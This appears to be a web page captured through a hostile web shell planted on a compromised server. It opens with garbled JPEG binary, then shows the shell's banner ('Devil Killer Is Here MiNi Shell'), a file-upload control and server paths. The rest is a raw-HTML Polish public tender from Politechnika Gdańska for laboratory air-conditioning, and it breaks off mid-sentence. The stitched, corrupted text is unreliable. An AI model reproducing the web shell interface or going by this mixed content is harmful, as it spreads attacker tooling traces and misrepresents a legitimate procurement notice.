JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220825/0031989301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie systemu chłodzenia w laboratoriach nr 23 oraz 142 w budynku A Wydziału Elektroniki, Telekomunikacji i Informatyki Politechniki Gdańskiej przy ul. Narutowicza 11/12 w Gdańsku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Gdańska</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Elektroniki Telekomunikacji i Informatyki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001620</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Narutowicza 11/12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-233</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 583486152</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">logistyka@eti.pg.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pg.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie systemu chłodzenia w laboratoriach nr 23 oraz 142 w budynku A Wydziału Elektroniki, Telekomunikacji i Informatyki Politechniki Gdańskiej przy ul. Narutowicza 11/12 w Gdańsku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-11249a21-2448-11ed-9071-8637ea33a6f9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00319893</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pg_edu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pg_edu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim.<br/>2. Postępowanie, którego dotyczy niniejszy dokument, oznaczone jest znakiem:CRZP/233/009/R/22<br/>3. Wykonawcy we wszystkich kontaktach z Zamawiającym powinni powoływać się na ten znak.<br/>4. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy<br/>zakupowej<br/>https://platformazakupowa.pl/pn/pg_edu oraz poczty elektronicznej.<br/>5. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>ogłoszenia lub znakiem postępowania.<br/>6. Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość”,<br/>nie za pośrednictwem adresu email.<br/>7. W celu skrócenia czasu udzielenia odpowiedzi na pytania Zamawiający preferuje, aby komunikacja między zamawiającym a<br/>wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie elektronicznej za<br/>pośrednictwem Platformy i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków,<br/>zawiadomień oraz informacji Zamawiający uzna datę ich przesłania za<br/>pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość” po<br/>których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>8. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej<br/>za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany<br/>specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie<br/>z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie<br/>przekazywana w formie elektronicznej za pośrednictwem Platformy do konkretnego<br/>wykonawcy.<br/>9. Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB<br/>Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów<br/>operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, za wyjątkiem Internet<br/>Explorer, ze względu na zakończenie z dniem 17 sierpnia 2021 r. wspierania<br/>przeglądarki Internet Explorer przez firmę Microsoft.<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format<br/>plików .pdf,<br/>f) Platforma działa według standardu przyjętego w komunikacji sieciowej –<br/>kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera<br/>zsynchronizowanego z zegarem Głównego Urzędu Miar.<br/>10. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia<br/>publicznego:<br/>a) musi zaakceptować warunki korzystania z platformazakupowa.pl określone w<br/>Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce<br/>„Regulamin&#34; oraz uznać go za wiążący,<br/>b) musi się zapoznać i stosować do Instrukcji składania ofert/wniosków dostępnej<br/>pod linkiem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1 oraz Dz. Urz. UE L 127 z 23.05.2018, str. 2), dalej<br/>„RODO”, Zamawiający informuje, że:<br/>a) administratorem Pani/Pana danych osobowych jest Politechnika Gdańska z siedzibą w 80-233 Gdańsk przy ul. G. Narutowicza<br/>11/12;<br/>b) inspektorem ochrony danych osobowych w Politechnice Gdańskiej jest mgr<br/>inż. Paweł Baniel, tel. +48 58 348-66-29, e-mail: iod@pg.edu.pl;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z przedmiotowym postępowaniem o udzielenie<br/>zamówienia publicznego nr CRZP/233/009/R/22 pn. „Wykonanie systemu<br/>chłodzenia w laboratoriach nr 23 oraz 142 w Budynku A WETI PG”<br/>prowadzonym w trybie podstawowym bez negocjacji;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych;<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania cały czas trwania<br/>umowy;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>h) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych (skorzystanie z prawa do sprostowania nie może skutkować<br/>zmianą wyniku postępowania udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może<br/>naruszać integralności protokołu oraz jego załączników)<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma<br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego<br/>Unii Europejskiej lub państwa członkowskiego);<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych<br/>z siedzibą w Warszawie, przy ul. Stawki 2, 00-193 Warszawa, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO;<br/>i) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Stosownie do art. 19 ust. 4 ustawy Pzp, Zamawiający informuje o ograniczeniach,<br/>o których mowa w art. 19 ust. 2 i 3 oraz 75 ustawy Pzp:<br/>1) Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.),<br/>zwanego dalej &#34;rozporządzeniem 2016/679&#34;, w celu umożliwienia korzystania ze środków<br/>ochrony prawnej, o których mowa w dziale IX, do upływu terminu na ich wniesienie<br/>2) Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w<br/>sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>3) W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o<br/>którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CRZP/233/009/R/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 21323103,00 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 132838,25 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie systemu chłodzenia w laboratoriach nr 23 oraz<br/>142 w budynku A Wydziału Elektroniki, Telekomunikacji i Informatyki Politechniki<br/>Gdańskiej przy ul. Narutowicza 11/12 w Gdańsku.<br/>Zakres robót do realizacji obejmuje:<br/>1/ wykonanie instalacji klimatyzacji w pomieszczeniu laboratoryjno-technicznym nr 23<br/>znajdującym się na poziomie 000 w budynku Wydziału Elektroniki, Telekomunikacji<br/>i Informatyki:<br/>- zakup dostawę i montaż dwóch klimatyzatorów typu SPLIT<br/>- wykonanie instalacji freonowej , odprowadzenia skroplin , oraz zasilania i sterowania<br/>- roboty demontażowe, rozbiórkowe i towarzyszące niezbędne do wykonania zadania<br/>takie jak wykuwanie otworów , wykonanie bruzd w ścianach , demontaż sufitów<br/>podwieszanych i ponowny ich montaż, demontaż jednostki zewnętrznej itp.<br/>- wykonanie wcinki do istniejącego pionu sanitarnego w celu odprowadzenia skroplin<br/>- prace zabezpieczające i porządkowe<br/>- roboty przygotowawcze niezbędne do wykonania zadania takie jak wykuwanie<br/>otworów, demontaż i ponowny montaż paneli sufitu podwieszanego itp.<br/>- montaż elementów koryt kablowych,<br/>- ułożenie okablowania: instalacja WLZ, instalacja sterownicza,<br/>- montaż elementów w rozdzielnicy elektrycznej,<br/>- prace zabezpieczające i porządkowe,<br/>- wykonanie pomiarów sprawdzających instalacji elektrycznej,<br/>- wykonanie dokumentacji powykonawczej branży elektrycznej i sanitarnej<br/>2/ wykonanie nowej instalacji klimatyzacji w pomieszczeniu laboratoryjno-technicznym EA<br/>142 znajdującym się na poziomie 100 w budynku Wydziału Elektroniki, Telekomunikacji<br/>i Informatyki.<br/>- odzysk i unieszkodliwienie czynnika chłodniczego<br/>- demontaż istniejącego systemu klimatyzacji typu MULTI<br/>- zakup, dostawę i montaż konstrukcji pod klimatyzator na balkonie<br/>- zakup, dostawę i montaż systemu klimatyzacji typu MULTI<br/>- wykonanie instalacji freonowej, odprowadzenia skroplin<br/>- wykorzystanie instalacji zasilania i sterowania<br/>- wykonanie pomiarów ochronnych , rezystancja izolacji , oraz skuteczność ochrony<br/>przed porażeniem<br/>- roboty demontażowe, rozbiórkowe i towarzyszące niezbędne do wykonania zadania<br/>takie jak wykuwanie otworów , wykonanie bruzd w ścianach , demontaż sufitów<br/>podwieszanych i ponowny ich montaż, demontaż jednostki zewnętrznej na dachu itp.<br/>- wykonanie wcinki do istniejącego pionu sanitarnego w celu odprowadzenia skroplin<br/>- prace zabezpieczające i porządkowe<br/>- wykonanie dokumentacji powykonawczej branży sanitarnej<br/>2. Dane liczbowe<br/>Powierzchnia pomieszczenia 23 - 23,70 m2<br/>Powierzchnia pomieszczenia 142 – 40,75 m2<br/>Ogółem powierzchnia remontowanych pomieszczeń 64,45 m2<br/>Wysokość remontowanych pomieszczeń – 3000 cm<br/>Remont dotyczy prac instalacyjnych, instalowania urządzeń klimatyzacji i elektrycznych<br/>3. Zamawiający nie dokonuje podziału zamówienia na części. Zamówienie jest zamówieniem<br/>udzielanym w częściach, jako odrębna część zamówienia ujętego w planie zamówień publicznych<br/>na roboty budowlane. Zakres i wielkość zamówienia daje możliwość udziału MŚP w rynku<br/>zamówień publicznych.<br/>4. Kody wg klasyfikacji Wspólnego Słownika Zamówień (CPV)<br/>453000000 - roboty instalacyjne w budynkach,<br/>45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych,<br/>45311200-2 – roboty w zakresie instalacji elektrycznych<br/>45315300-1 – instalacje zasilania elektrycznego<br/>5. Na szczegółowy opis przedmiotu zamówienia składa się:<br/>1/ Projekt Wykonawczy – Branża Sanitarna – Laboratorium nr 23<br/>2/ Projekt Wykonawczy – Branża Elektryczna – Laboratorium nr 23<br/>3/ Projekt Wykonawczy – Branża Sanitarna – Laboratorium nr 142<br/>4/ STWiORB – Branża Sanitarna i Elektryczna – Laboratorium nr 23<br/>5/ STWiORB – Branża Sanitarna – Laboratorium nr 142<br/>Uwaga !!!<br/>Do specyfikacji załączono przedmiar – załącznik III do SWZ. Przedmiar pełni rolę<br/>wyłącznie pomocniczo – informacyjną i nie stanowi opisu przedmiotu zamówienia.<br/>Przedmiar zawiera zestawienie przewidywanych robót w celu zobrazowania skali<br/>zamierzenia budowlanego i ułatwienia Wykonawcom oszacowanie kosztów realizacji<br/>przedmiotu zamówienia, nie może służyć wprost do obliczenia ceny ofertowej.<br/>Wykonawca zobowiązany jest do uwzględnienia w cenie oferty wszystkich kosztów<br/>związanych z wykonywaniem przez niego wszystkich czynności i obowiązków<br/>wynikających z dokumentacji projektowej, obowiązujących przepisów prawa, a także z<br/>warunków prowadzenia robót.<br/>Uwaga!!!<br/>Budynek w czasie prowadzonych robót budowlanych będzie przez cały czas użytkowany.<br/>Wykonawca zapewni dostęp do budynku, dla osób niepełnosprawnych, przez istniejący podjazd przy wejściu głównym do budynku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">105 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta wykonawcy, która uzyska łącznie największą liczbę<br/>punktów zgodnie z poniższym wzorem:<br/>P = Lcena+LOG<br/>gdzie:<br/>P - łączna liczba punktów ocenianej oferty<br/>Lcena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/>LOG - liczba uzyskanych punktów dla kryterium „Okres gwarancji” ocenianej oferty<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom określonym w SWZ i<br/>zostanie oceniona jako najkorzystniejsza w oparciu o podane wyżej kryteria oceny ofert. Zamawiający zastosuje zaokrąglenie<br/>wyników do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Wykonawca spełni warunek udziału w postępowaniu dotyczący uprawnień do prowadzenia określonej jeżeli wykaże, że posiada „certyfikat przedsiębiorcy”, o którym mowa w art. 29 ustawy z dnia 15.05.2015 r. o substancjach zubażających warstwę ozonową oraz o niektórych 